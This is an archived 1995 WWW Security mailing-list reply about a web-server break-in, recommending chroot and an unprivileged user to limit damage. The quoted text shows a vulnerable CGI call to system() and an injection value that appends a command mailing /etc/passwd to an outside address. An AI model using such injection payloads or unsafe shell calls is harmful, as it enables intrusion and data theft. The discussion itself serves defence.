[329] in WWW Security List Archive
Re: GE Break-in: via HTTPD?
daemon@ATHENA.MIT.EDU (Chuck Yerkes)
Tue Jan 17 12:28:36 1995
From: Chuck Yerkes <yerkes_chuck@jpmorgan.com>
To: www-security@ns2.rutgers.edu
Date: Tue, 17 Jan 1995 08:48:48 -0500 (EST)
In-Reply-To: <Pine.3.89.9501161234.A14378-0100000@sdcc8.ucsd.edu> from "Paul Phillips" at Jan 16, 95 12:47:01 pm
Reply-To: www-security@ns2.rutgers.edu
Errors-To: owner-www-security@ns2.rutgers.edu
> On Mon, 16 Jan 1995, Mr. Tom Cozzolino wrote:
>
> > How is it possible? More importantly, how do we prevent
> > this from happening again?
>
> Consider a form mail script that takes a user supplied variable and
> passes it to mail like so:
>
> system("/usr/ucb/mail -s $to_whoever");
>
> I figure out that this is what it's doing, and make my own form that
> passes to $to_whoever "foo;mail psp@ucsd.edu </etc/passwd".
HOW do we limit it?
I run the server daemon as nobody.nobody AFTER "chroot'ing"
it to it's own partition. Getting /etc/passwd is non-damage -
the password file it as valid as for anon-ftp.
I don't particularly trust the server code (NCSA, CERN - with Spry
and Netscape I can't even look at source), it's complex and sometimes,
occasionally, complex code has bugs (it's rare, I know ;-).
It I can limit those problems with permissions and chroot, damage
control is more likely. It DOES mean perl et al must live under the
chroot area, but for a public server, it's one of the costs.
chuck yerkes
consultant guy,
---------------------------------------------------
<< Generic disclaimer here >>
